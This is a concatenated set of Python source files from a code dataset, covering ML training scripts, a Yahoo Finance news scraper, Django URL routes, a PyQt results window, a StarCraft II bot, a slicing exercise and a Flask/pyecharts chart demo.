df_pred_tournament = pd.DataFrame({\n 'id': tour['id'],\n 'probability': bagged_prediction_tour\n })\n ll=log_loss(valid.target, bagged_prediction)\n csv_path = predictions + './rf_predictions_{}_{}.csv'.format(int(time.time()), str(ll)[2:])\n df_pred_tournament.to_csv(csv_path, columns=('id', 'probability'), index=None)\n print('Saved: {}'.format(csv_path))\n txt_path = logs + \"stats_rf_v1.txt\"\n with open(txt_path, \"a\") as g:\n g.write('\\n' + 'random forest v1')\n g.write('\\n' + 'logloss:' + str(ll))\n g.write('\\n' + 'consistency:' + str(consistency))\n g.close()\n print('Saved stats: {}'.format(txt_path))\n\nprint('Fished: {}s'.format(time.time() - start_time))\n\n","sub_path":"random_forest_v1.py","file_name":"random_forest_v1.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"237751651","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date, datetime\nfrom model.news import StockInfo\nimport re\n\n\nclass YahooHelper:\n def __init__(self):\n self.parser = 'html.parser'\n\n def fetch_news(self, stock):\n url = f\"https://finance.yahoo.com/quote/{stock}/news?p={stock}\"\n list_of_stock_info = []\n header = {'Connection': 'keep-alive',\n 'Expires': '-1',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) \\\n AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'\n }\n try:\n with requests.get(url, stream=True, headers=header) as page:\n\n soup = BeautifulSoup(page.content, self.parser)\n\n # Need to get the latest article\n # Cf\n latest_news_article = soup.find_all(\n \"div\", class_=\"Cf\")[3]\n\n uuid = latest_news_article.h3.next['data-uuid']\n\n # Description latest_news_article.p.text\n list_of_sentences = latest_news_article.p.text.split(\". \")\n description = '. '.join(list_of_sentences[0:2])\n\n # Title latest_news_article.h3.text\n title = latest_news_article.h3.text\n\n # source latest_news_article.h3.previous\n source = latest_news_article.h3.previous\n\n source_url = latest_news_article.h3.next['href']\n news_url = 'https://finance.yahoo.com' + source_url\n\n published_at = self.get_time_of_article(news_url, header)\n\n stock_price = soup.find(\n id=\"quote-header-info\").contents[2].text\n if('+' in stock_price):\n clean_price = stock_price.split('+')[0]\n else:\n clean_price = stock_price.split('-')[0]\n stock_info = StockInfo(uuid, title, source, published_at,\n description, news_url, stock, clean_price)\n\n list_of_stock_info.append(stock_info)\n except Exception as ex:\n print(\"Error: \", ex, \"Occurred with \" + stock)\n\n return list_of_stock_info\n\n def get_time_of_article(self, new_url, header):\n try:\n with requests.get(new_url, stream=True, headers=header) as page:\n soup = BeautifulSoup(page.content, self.parser)\n return soup.time.text\n except Exception as ex:\n print(\"Error: \", ex, \"Could not process request: \" + new_url)\n current_timestamp = datetime.now()\n return datetime.strftime(current_timestamp, '%B %d, %Y, %I:%M %p')\n","sub_path":"yahoo_news.py","file_name":"yahoo_news.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"517652509","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth.views import LogoutView\n\nurlpatterns = [\n path('login/',views.CustomLogin.as_view(), name='login'),\n path('logout/',LogoutView.as_view(next_page='login'), name='logout'),\n path('',views.index,name='home'),\n path('song-list',views.SongItemBucket.as_view(), name='song-list'),\n path('song-item/<int:pk>/',views.SongItemDetail.as_view(), name='song-item'),\n path('song-item-create/',views.SongItemCreate.as_view(), name='song-item-create'),\n path('song-item-update/<int:pk>/',views.SongItemUpdate.as_view(), name='song-item-update'),\n path('song-item-delete/<int:pk>/',views.SongItemDelete.as_view(), name='song-item-delete'),\n\n #path('create/',views.create_view,name='create'),\n #path('retrieve/',views.list_view,name='retrieve'),\n #path('<id>/delete', views.delete_view,name='delete'),\n\n path('podcast-list',views.PodcastItemBucket.as_view(), name='podcast-list'),\n path('podcast-item/<int:pk>/',views.PodcastItemDetail.as_view(), name='podcast-item'),\n path('podcast-item-create/',views.PodcastItemCreate.as_view(), name='podcast-item-create'),\n path('podcast-item-update/<int:pk>/',views.PodcastItemUpdate.as_view(), name='podcast-item-update'),\n path('podcast-item-delete/<int:pk>/',views.PodcastItemDelete.as_view(), name='podcast-item-delete'),\n path('participant-item-create/',views.ParticipantCreate.as_view(), name='participant-item-create'),\n \n\n path('audiobook-list',views.AudiobookItemBucket.as_view(), name='audiobook-list'),\n path('audiobook-item/<int:pk>/',views.AudiobookItemDetail.as_view(), name='audiobook-item'),\n path('audiobook-item-create/',views.AudiobookItemCreate.as_view(), name='audiobook-item-create'),\n path('audiobook-item-update/<int:pk>/',views.AudiobookItemUpdate.as_view(), name='audiobook-item-update'),\n path('audiobook-item-delete/<int:pk>/',views.AudiobookItemDelete.as_view(), name='audiobook-item-delete'),\n\n #path('/audio/<int:pk>',)\n]","sub_path":"audio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"283068259","text":"from django.conf.urls import url\n\nfrom . import views\napp_name = 'elfs'\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^list/$', views.list, name='list'),\n url(r'^add/$', views.add, name='add'),\n url(r'^search/$', views.search, name='search'),\n url(r'^(?P<slug>[-\\w]+)/$', views.detail, name='detail'),\n]","sub_path":"list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"539511773","text":"import logging\n\nfrom kerastuner.tuners import RandomSearch\nfrom tensorflow import keras\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Flatten\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.python.keras import regularizers\nfrom tensorflow.python.keras.callbacks import EarlyStopping\nfrom tensorflow.python.keras.models import Sequential\n\nlogger = logging.getLogger(__name__)\n\n\nclass A2:\n \"\"\"\n class to create a model\n :param input_dim: the input dimension of the data\n :return: the sequential model\n \"\"\"\n\n def __init__(self, input_dim, X_train, Y_train, X_val, Y_val):\n self.input_shape = input_dim\n self.X_train, self.Y_train = X_train, Y_train\n self.X_val, self.Y_val = X_val, Y_val\n self.model = self.create_model()\n self.model.summary()\n\n def create_model(self):\n self.model = Sequential()\n\n self.model.add(Conv2D(filters=176, kernel_size=(5, 5), input_shape=self.input_shape, padding=\"same\",\n kernel_regularizer=regularizers.l2(l=0.0001), activation='relu'))\n self.model.add(Conv2D(filters=96, kernel_size=(5, 5), padding=\"same\",\n kernel_regularizer=regularizers.l2(l=0.0001), activation='relu'))\n self.model.add(MaxPooling2D(pool_size=(2, 2)))\n\n self.model.add(Conv2D(filters=48, kernel_size=(5, 5), padding=\"same\",\n kernel_regularizer=regularizers.l2(l=0.0001), activation='relu'))\n self.model.add(MaxPooling2D(pool_size=(2, 2)))\n self.model.add(Dropout(0.3))\n\n self.model.add(Flatten())\n\n self.model.add(Dense(800, activation='relu'))\n self.model.add(Dropout(0.5))\n\n self.model.add(Dense(1, activation='sigmoid'))\n\n adam = keras.optimizers.Adam(lr=0.0003)\n\n self.model.compile(loss='binary_crossentropy',\n optimizer=adam,\n metrics=['accuracy'])\n\n return self.model\n\n def train(self):\n \"\"\"\n Fit function\n \"\"\"\n es = EarlyStopping(monitor='val_loss', patience=3)\n\n history = self.model.fit(\n self.X_train, self.Y_train,\n epochs=30,\n verbose=True,\n batch_size=32,\n callbacks=[es],\n validation_data=(self.X_val, self.Y_val))\n\n return self.model, history\n\n def tune_model(self, hp):\n model = keras.Sequential([\n keras.layers.Conv2D(\n filters=hp.Int('conv_1_filter', min_value=32, max_value=128, step=16),\n kernel_size=hp.Choice('conv_1_kernel', values=[3, 4, 5]),\n activation='relu',\n input_shape=self.input_shape\n ),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.Dropout(hp.Choice('drop_out', values=[0.2, 0.3, 0.5])),\n\n keras.layers.Conv2D(\n filters=hp.Int('conv_2_filter', min_value=32, max_value=128, step=16),\n kernel_size=hp.Choice('conv_2_kernel', values=[3, 4, 5]),\n activation='relu'\n ),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.Dropout(hp.Choice('drop_out', values=[0.2, 0.3, 0.5])),\n\n keras.layers.Conv2D(\n filters=hp.Int('conv_3_filter', min_value=32, max_value=128, step=16),\n kernel_size=hp.Choice('conv_3_kernel', values=[3, 4, 5]),\n activation='relu'\n ),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.Dropout(hp.Choice('drop_out_dense', values=[0.2, 0.3, 0.5])),\n\n keras.layers.Flatten(),\n\n keras.layers.Dense(\n units=hp.Int('dense_1_units', min_value=32, max_value=2048, step=32),\n activation='relu'\n ),\n keras.layers.Dense(1, activation='sigmoid')\n ])\n\n model.compile(optimizer=keras.optimizers.Adam(hp.Choice('learning_rate', values=[0.01, 0.001, 0.0003, 0.0015])),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n return model\n\n def fit_tune(self):\n \"\"\"\n Auto Fit function\n \"\"\"\n tuner_search = RandomSearch(self.tune_model,\n objective='val_accuracy',\n max_trials=5, directory='tests/kerastuner_out', project_name=\"task_A2\")\n\n tuner_search.search(self.X_train, self.Y_train, epochs=5, validation_split=0.3)\n\n model = tuner_search.get_best_models(num_models=1)[0]\n\n model.fit(self.X_train, self.Y_train, epochs=25, validation_split=0.3, initial_epoch=5)\n\n return model\n\n def evaluate_model(self, task):\n score = self.model.evaluate(self.X_val, self.Y_val, verbose=0)\n print(\"--------------------------------------------------\")\n print('| Task: %s | loss: %.3f, | Accuracy: %.2f |' % (task, score[0], score[1]))\n print(\"--------------------------------------------------\")\n\n return score[0], score[1]\n\n","sub_path":"A2/A2.py","file_name":"A2.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"258873109","text":"from pickle import load\n\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot, QObject\nimport cv2\n\nfrom objects.UI import UI\nfrom objects.BrowseFiles import BrowseFilesDialog\nfrom objects.MessageBox import MessageBox\n\n\nclass ResultsWindow(QObject, UI):\n def __init__(self, geometry=None):\n super().__init__()\n self.root = get_root_path(__file__)\n self.graph_path = '{}/data/qt/graph.png'.format(str(self.root))\n self.hist_path = '{}/data/qt/hist.png'.format(str(self.root))\n with open('{}/data/qt/temp/film.pkl'.format(str(self.root)), 'rb') as f:\n self.film = load(f)\n self.geometry = geometry\n\n def setupUi(self, MainWindow):\n if self.geometry:\n MainWindow.resize(self.geometry[2], self.geometry[3])\n else:\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(919, 553)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(0, 0, 555, 475))\n url = \"image: url({});\".format(str(self.graph_path))\n self.frame.setStyleSheet(url)\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.textEdit = QtWidgets.QTextEdit(self.centralwidget)\n self.textEdit.setGeometry(QtCore.QRect(550, 0, 371, 475))\n self.textEdit.setObjectName(\"textEdit\")\n self.layoutWidget = QtWidgets.QWidget(self.centralwidget)\n self.layoutWidget.setGeometry(QtCore.QRect(60, 490, 200, 29))\n self.layoutWidget.setObjectName(\"layoutWidget\")\n self.VisualizationButtons = QtWidgets.QHBoxLayout(self.layoutWidget)\n self.VisualizationButtons.setContentsMargins(0, 0, 0, 0)\n self.VisualizationButtons.setObjectName(\"VisualizationButtons\")\n self.graphButton = QtWidgets.QPushButton(self.layoutWidget)\n self.graphButton.setObjectName(\"graphButton\")\n self.VisualizationButtons.addWidget(self.graphButton)\n self.histButton = QtWidgets.QPushButton(self.layoutWidget)\n self.histButton.setObjectName(\"histButton\")\n self.VisualizationButtons.addWidget(self.histButton)\n self.widget = QtWidgets.QWidget(self.centralwidget)\n self.widget.setGeometry(QtCore.QRect(540, 490, 375, 29))\n self.widget.setObjectName(\"widget\")\n self.SaveButtons = QtWidgets.QHBoxLayout(self.widget)\n self.SaveButtons.setContentsMargins(0, 0, 0, 0)\n self.SaveButtons.setObjectName(\"SaveButtons\")\n self.saveStats = QtWidgets.QPushButton(self.widget)\n self.saveStats.setObjectName(\"saveStats\")\n self.SaveButtons.addWidget(self.saveStats)\n self.saveGraphButton = QtWidgets.QPushButton(self.widget)\n self.saveGraphButton.setObjectName(\"saveGraphButton\")\n self.SaveButtons.addWidget(self.saveGraphButton)\n self.saveHistButton = QtWidgets.QPushButton(self.widget)\n self.saveHistButton.setObjectName(\"saveHistButton\")\n self.SaveButtons.addWidget(self.saveHistButton)\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n self.graphButton.clicked.connect(self.graphSlot)\n self.histButton.clicked.connect(self.histSlot)\n self.saveStats.clicked.connect(self.saveStatsSlot)\n self.saveGraphButton.clicked.connect(self.saveGraphSlot)\n self.saveHistButton.clicked.connect(self.saveHistSlot)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.graphButton.setText(_translate(\"MainWindow\", \"Graph\"))\n self.histButton.setText(_translate(\"MainWindow\", \"Histogram\"))\n self.saveStats.setText(_translate(\"MainWindow\", \"Save Statistics\"))\n self.saveGraphButton.setText(_translate(\"MainWindow\", \"Save Graph\"))\n self.saveHistButton.setText(_translate(\"MainWindow\", \"Save Histogram\"))\n\n self.textEdit.setText(\n \"\"\"\n Average Shot Length: {}\\n\n Median Shot Length: {}\\n\n Standard Deviation: {}\\n\n Longest Shot: {}\\n\n Shortest Shot: {}\n \"\"\".format(str(self.film.average_shot_length), str(self.film.median_shot_length), str(self.film.standard_deviation),\n str(max(self.film.shot_lengths)), str(min(self.film.shot_lengths))))\n\n @pyqtSlot()\n def graphSlot(self):\n url = \"image: url({});\".format(str(self.graph_path))\n self.frame.setStyleSheet(url)\n self.app.processEvents()\n\n @pyqtSlot()\n def histSlot(self):\n url = \"image: url({});\".format(str(self.hist_path))\n self.frame.setStyleSheet(url)\n self.app.processEvents()\n\n @pyqtSlot()\n def saveGraphSlot(self):\n dialog = BrowseFilesDialog()\n save_path = dialog.saveFileDialog()\n try:\n img = cv2.imread(self.graph_path)\n except:\n MessageBox('Could not write graph to disk. Check filename. Supported image files are: png, jpg, jpeg, tiff')\n if not img is None:\n try:\n cv2.imwrite(save_path, img)\n except:\n MessageBox('Graph could not be saved for unknown reasons.')\n try:\n test = cv2.imread(save_path)\n if test is not None:\n MessageBox('Graph successfully saved.')\n else:\n MessageBox('Unknown error saving graph. Check if extension is correct. Supported extensions are:'\n 'png, jpg, jpeg, tiff.')\n except:\n MessageBox('Unknown error saving graph. Check if extension is correct. Supported extensions are:'\n 'png, jpg, jpeg, tiff.')\n\n @pyqtSlot()\n def saveHistSlot(self):\n dialog = BrowseFilesDialog()\n save_path = dialog.saveFileDialog()\n try:\n img = cv2.imread(self.hist_path)\n except:\n MessageBox('Could not read histogram file. Verify that it exists at: {}'.format(str(self.hist_path)))\n\n if not img is None:\n try:\n cv2.imwrite(save_path, img)\n except:\n MessageBox('Histogram could not be saved for unknown reasons.')\n try:\n test = cv2.imread(save_path)\n if test is not None:\n MessageBox('Histogram successfully saved.')\n else:\n MessageBox('Unknown error saving histogram. Check if extension is correct. Supported extensions are:'\n 'png, jpg, jpeg, tiff.')\n except:\n MessageBox('Unknown error saving histogram. Check if extension is correct. Supported extensions are:'\n 'png, jpg, jpeg, tiff.')\n\n @pyqtSlot()\n def saveStatsSlot(self):\n dialog = BrowseFilesDialog()\n save_path = dialog.saveFileDialog()\n if save_path:\n with open(save_path, 'w+') as f:\n f.write('Number of Shots: {}\\n'.format(str(len(self.film.shot_lengths))))\n f.write('Average Shot Length: {}\\n'.format(str(self.film.average_shot_length)))\n f.write('Median Shot Length: {}\\n'.format(str(self.film.median_shot_length)))\n f.write('Standard Deviation: {}\\n'.format(str(self.film.standard_deviation)))\n f.write('Longest Shot: {}\\n'.format(str(max(self.film.shot_lengths))))\n f.write('Shortest Shot: {}\\n'.format(str(min(self.film.shot_lengths))))\n try:\n with open(save_path, 'r') as f:\n text = f.read()\n if not text:\n MessageBox('Statistics could not be saved for unknown reasons.')\n else:\n MessageBox('Statistics saved successfully.')\n except:\n MessageBox('Statistics could not be saved for unknown reasons.')\n\n\n\n\n\n","sub_path":"owl/objects/Results.py","file_name":"Results.py","file_ext":"py","file_size_in_byte":8374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159602451","text":"import random\nimport sc2 \nfrom sc2 import run_game, maps, Race, Difficulty, position\nfrom sc2.player import Bot, Computer\nfrom sc2.constants import NEXUS, PROBE, PYLON, ASSIMILATOR, GATEWAY, \\\n CYBERNETICSCORE, STALKER, STARGATE, VOIDRAY, OBSERVER, ROBOTICSFACILITY\nimport cv2\nimport numpy as np\nimport time\n\nfrom examples.protoss.cannon_rush import CannonRushBot\n\nHEADLESS = False\n\nclass SentdeBot(sc2.BotAI):\n def __init__(self):\n self.ITERATIONS_PER_MINUTE = 165\n self.MAX_WORKERS = 50\n self.do_something_after = 0\n self.train_data = []\n\n\n async def on_step(self, iteration):\n self.iteration = iteration\n # print(self.iteration/self.ITERATIONS_PER_MINUTE)\n await self.scout()\n await self.distribute_workers()\n await self.build_workers()\n await self.build_pylons()\n await self.build_assimilators()\n await self.expand()\n await self.offensive_force_buildings()\n await self.build_offensive_force()\n await self.attack()\n\n \n async def build_workers(self):\n if len(self.units(NEXUS))*16 > len(self.units(PROBE)):\n if len(self.units(PROBE)) < self.MAX_WORKERS:\n for nexus in self.units(NEXUS).ready.noqueue:\n if self.can_afford(PROBE):\n await self.do(nexus.train(PROBE))\n \n async def build_pylons(self):\n if self.supply_left < 5 and not self.already_pending(PYLON):\n nexuses = self.units(NEXUS).ready\n if nexuses.exists:\n if self.can_afford(PYLON):\n await self.build(PYLON, near=nexuses.first)\n \n async def build_assimilators(self):\n for nexus in self.units(NEXUS).ready:\n vaspenes = self.state.vespene_geyser.closer_than(10.0, nexus)\n for vaspene in vaspenes:\n if not self.can_afford(ASSIMILATOR):\n break\n worker = self.select_build_worker(vaspene.position)\n if worker is None:\n break\n if not self.units(ASSIMILATOR).closer_than(1.0, vaspene).exists:\n await self.do(worker.build(ASSIMILATOR, vaspene))\n \n async def expand(self):\n if self.units(NEXUS).amount < (self.iteration / self.ITERATIONS_PER_MINUTE) and self.can_afford(NEXUS):\n await self.expand_now()\n \n async def build_offensive_force(self):\n for sg in self.units(STARGATE).ready.noqueue:\n if self.can_afford(VOIDRAY) and self.supply_left > 0:\n await self.do(sg.train(VOIDRAY))\n\n async def offensive_force_buildings(self):\n #print(self.iteration / self.ITERATIONS_PER_MINUTE)\n if self.units(PYLON).ready.exists:\n pylon = self.units(PYLON).ready.random\n\n if self.units(GATEWAY).ready.exists and not self.units(CYBERNETICSCORE):\n if self.can_afford(CYBERNETICSCORE) and not self.already_pending(CYBERNETICSCORE):\n await self.build(CYBERNETICSCORE, near=pylon)\n\n elif len(self.units(GATEWAY)) < 1:\n if self.can_afford(GATEWAY) and not self.already_pending(GATEWAY):\n await self.build(GATEWAY, near=pylon)\n\n if self.units(CYBERNETICSCORE).ready.exists:\n if len(self.units(ROBOTICSFACILITY)) < 1:\n if self.can_afford(ROBOTICSFACILITY) and not self.already_pending(ROBOTICSFACILITY):\n await self.build(ROBOTICSFACILITY, near=pylon)\n\n if self.units(CYBERNETICSCORE).ready.exists:\n if len(self.units(STARGATE)) < (self.iteration / self.ITERATIONS_PER_MINUTE):\n if self.can_afford(STARGATE) and not self.already_pending(STARGATE):\n await self.build(STARGATE, near=pylon)\n\n def random_location_variance(self, enemy_start_location):\n x = enemy_start_location[0]\n y = enemy_start_location[1]\n\n x += ((random.randrange(-20, 20))/100) * enemy_start_location[0]\n y += ((random.randrange(-20, 20))/100) * enemy_start_location[1]\n\n if x < 0:\n x = 0\n if y < 0:\n y = 0\n if x > self.game_info.map_size[0]:\n x = self.game_info.map_size[0]\n if y > self.game_info.map_size[1]:\n y = self.game_info.map_size[1]\n\n go_to = position.Point2(position.Pointlike((x,y)))\n return go_to\n \n async def scout(self):\n if len(self.units(OBSERVER)) > 0:\n scout = self.units(OBSERVER)[0]\n if scout.is_idle:\n enemy_location = self.enemy_start_locations[0]\n move_to = self.random_location_variance(enemy_location)\n print(move_to)\n await self.do(scout.move(move_to))\n\n else:\n for rf in self.units(ROBOTICSFACILITY).ready.noqueue:\n if self.can_afford(OBSERVER) and self.supply_left > 0:\n await self.do(rf.train(OBSERVER))\n\n def find_target(self, state):\n if len(self.known_enemy_units) > 0:\n return random.choice(self.known_enemy_units)\n elif len(self.known_enemy_structures) > 0:\n return random.choice(self.known_enemy_structures)\n else:\n return self.enemy_start_locations[0]\n\n async def attack(self):\n if len(self.units(VOIDRAY).idle) > 0:\n choice = random.randrange(0, 4)\n target = False\n if self.iteration > self.do_something_after:\n if choice == 0:\n # no attack\n wait = random.randrange(20, 165)\n self.do_something_after = self.iteration + wait\n\n elif choice == 1:\n #attack_unit_closest_nexus\n if len(self.known_enemy_units) > 0:\n target = self.known_enemy_units.closest_to(random.choice(self.units(NEXUS)))\n\n elif choice == 2:\n #attack enemy structures\n if len(self.known_enemy_structures) > 0:\n target = random.choice(self.known_enemy_structures)\n\n elif choice == 3:\n #attack_enemy_start\n target = self.enemy_start_locations[0]\n\n if target:\n for vr in self.units(VOIDRAY).idle:\n await self.do(vr.attack(target))\n y = np.zeros(4)\n y[choice] = 1\n\n\nrun_game(\n maps.get(\"AbyssalReefLE\"), \n [\n Bot(Race.Protoss, SentdeBot()),\n Computer(Race.Terran, Difficulty.Easy)\n ],\n realtime=False\n)","sub_path":"py_agent.py","file_name":"py_agent.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"184163410","text":"\"\"\"\nTitle: slicing_lab\nDate: 10/25/2019\nDev: K.Shaffer\n\n\"\"\"\n\n\n# Swaps first and last entry\ndef exchange_First_last(sequence):\n first = sequence[0]\n last = sequence[-1]\n\n if type(sequence) == str:\n sequence = last + sequence[1:-1] + first\n\n if type(sequence) == tuple:\n sequence = (last,) + sequence[1:-1] + (first,)\n\n return sequence\n# Removes every other entry\ndef remove_Every_Other(sequence):\n sequence = sequence[1::2]\n return sequence\n\n# Swaps first 4 and last 4 entries\ndef first_Four_Last_Four(sequence):\n first4 = sequence[0:4]\n last4 = sequence[-4:]\n sequence = last4 + sequence[4:-4] +first4\n return sequence\n\n# Reverses all entries\ndef reverse(sequence):\n sequence = sequence[::-1]\n return sequence\n\n# Slices sequence in thirds and reorders them\ndef thirds(sequence):\n length = int(len(sequence) / 3)\n first = sequence[:length]\n second = sequence[length:-length]\n third = sequence[-length:]\n sequence = second + third + first\n return sequence\n\n\n# Tests\n\ns = \"this is a string\"\ns1 = \"ThrTwoOne\"\nt = (2, 54, 13, 12, 5, 32)\nt1 = (1, 2, 3, 4, 5, 6, 7, 8)\n\nassert exchange_First_last(s) == \"ghis is a strint\"\nassert exchange_First_last(t) == (32, 54, 13, 12, 5, 2)\nassert remove_Every_Other(s) == \"hsi tig\"\nassert remove_Every_Other(t) == (54, 12, 32)\nassert first_Four_Last_Four(s) == \"ring is a stthis\"\nassert first_Four_Last_Four(t1) == (5, 6, 7, 8, 1, 2, 3, 4)\nassert reverse(s) == \"gnirts a si siht\"\nassert reverse(t) == (32, 5, 12, 13, 54, 2)\nassert thirds(s1) == \"TwoOneThr\"\nassert thirds(t) == (13, 12, 5, 32, 2, 54)\n","sub_path":"students/K_Shaffer/lesson03/slicing_lab.py","file_name":"slicing_lab.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"386951560","text":"import pygame, os\n\ndef getImages():\n # General Sprites\n spriteList, imageList = [], []\n for root, dirs, files in os.walk('./Sprites/General/'):\n for name in files:\n if name.endswith('.png'):\n full_name = os.path.join(root, name)\n spriteList.append(name[:-4])\n imageList.append(pygame.image.load(full_name))\n IMAGESDICT = dict(zip(spriteList, imageList))\n\n # Item Sprites\n itemnameList = [image[:-4] for image in os.listdir('./Sprites/Items/') if image.endswith('.png')]\n imageList = [pygame.image.load('./Sprites/Items/' + image) for image in os.listdir('./Sprites/Items/') if image.endswith('.png')]\n ITEMDICT = dict(zip(itemnameList, imageList))\n # Just name of file\n\n # Unit Sprites\n unitnameList, imageList = [], []\n for root, dirs, files in os.walk('./Sprites/Characters/'):\n for name in files:\n if name.endswith('.png'):\n full_name = os.path.join(root, name)\n unitnameList.append(name[:-4])\n imageList.append(pygame.image.load(full_name))\n UNITDICT = dict(zip(unitnameList, imageList))\n \n return IMAGESDICT, UNITDICT, ITEMDICT\n\nif __name__ == '__main__':\n getImages()\n","sub_path":"imagesDict.py","file_name":"imagesDict.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"603076008","text":"#encoding=utf-8\nfrom flask import Flask\nimport random\nfrom pyecharts import Scatter3D\n#from pyecharts.constants import DEFAULT_HOSTS\nfrom flask import Flask, render_template\nfrom pyecharts_javascripthon.api import TRANSLATOR\nfrom pyecharts import Bar\napp = Flask(__name__)\n\nREMOTE_HOST = \"https://pyecharts.github.io/assets/js\"\n@app.route('/')\ndef hello_world():\n s3d = scatter3d()\n return render_template(\n \"pyecharts.html\",\n myechart=s3d.render_embed(),\n host=REMOTE_HOST,\n script_list=s3d.get_js_dependencies(),\n )\n\ndef scatter3d():\n data = [generate_3d_random_point() for _ in range(80)]\n range_color = [\n \"#313695\",\n \"#4575b4\",\n \"#74add1\",\n \"#abd9e9\",\n \"#e0f3f8\",\n \"#fee090\",\n \"#fdae61\",\n \"#f46d43\",\n \"#d73027\",\n \"#a50026\",\n ]\n scatter3D = Scatter3D(\"3D scattering plot demo\", width=1200, height=600)\n scatter3D.add(\"\", data, is_visualmap=True, visual_range_color=range_color)\n return scatter3D\n\ndef generate_3d_random_point():\n return [\n random.randint(0, 100), random.randint(0, 100), random.randint(0, 100)\n ]\n\n@app.route('/one')\ndef app_1():\n bar = Bar(\"一周邮件量\", \"海南邮政数据中心\")\n bar.add(\"当日递\", [\"周一\", \"周二\", \"周三\", \"周四\", \"周五\", \"周六\",\"周日\"], [5, 20, 36, 10, 75, 90,28])\n bar.add(\"次日递\", [\"周一\", \"周二\", \"周三\", \"周四\", \"周五\", \"周六\",\"周日\"], [25, 10, 56, 70, 25, 40,88])\n ret_html = render_template('pyecharts.html',\n myechart=bar.render_embed(),\n mytitle=u\"数据演示\",\n host='/static',\n script_list=bar.get_js_dependencies())\n return ret_html\n@app.route('/two')\ndef app_2():\n from pyecharts import Gauge\n gauge = Gauge(\"业务量完成情况\",\"函件\",width=600, height=300)\n gauge.add(\"海口\", \"\", 86.66,scale_range=[0,100],angle_range=[180,0])\n\n gauge1 = Gauge(\"业务收入完成情况\",\"函件\",width=600, height=300)\n gauge1.add(\"海口\", \"\", 88.99)\n ret_html = render_template('pyecharts.html',\n myechart=gauge.render_embed()+gauge1.render_embed(),\n mytitle=u\"数据演示\",\n host='/static',\n script_list=gauge.get_js_dependencies())\n return ret_html\n\n@app.route('/three')\ndef app_3():\n _bar = bar_chart()\n javascript_snippet = TRANSLATOR.translate(_bar.options)\n return render_template(\n \"mypyecharts.html\",\n chart_id=_bar.chart_id,\n host=REMOTE_HOST,\n renderer=_bar.renderer,\n my_width=\"100%\",\n my_height=600,\n custom_function=javascript_snippet.function_snippet,\n options=javascript_snippet.option_snippet,\n script_list=_bar.get_js_dependencies(),\n )\n\ndef bar_chart():\n bar = Bar(\"我的第一个图表\", \"这里是副标题\")\n # bar.use_theme('dark')\n attr = [\"衬衫\", \"羊毛衫\", \"雪纺衫\", \"裤子\", \"高跟鞋\", \"袜子\"]\n bar.add(\n \"商家A\", attr, [5, 20, 36, 10, 75, 90],is_more_utils=True\n )\n bar.add(\n \"商家B\", attr, [5, 20, 36, 10, 75, 90],is_more_utils=True\n )\n return bar\n\n\nif __name__ == '__main__':\n app.run(host=\"127.0.0.1\", port=9999)\n","sub_path":"flashecharts.py","file_name":"flashecharts.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"632757403","text":"import os\n# from pathlib import Path\nimport re\nimport regexUpper\nfrom contextlib import contextmanager\n\n# regexUpper.main() # check module is working\n\n\n@contextmanager\ndef change_dir(destination):\n try:\n cwd = os.getcwd()\n os.chdir(destination)\n yield\n finally:\n os.chdir(cwd)\n\n\n# txtFilePath = Path.cwd() / 'Desktop/GperturbNew/StableStructures/textFiles'\n# txtFilePath = Path.cwd().parent / 'textFiles'\n\nsims = ['A', 'B', 'CS1', 'CS2', 'CS3', 'CS4',\n 'CS5', 'CS6', 'D2', 'DS1', 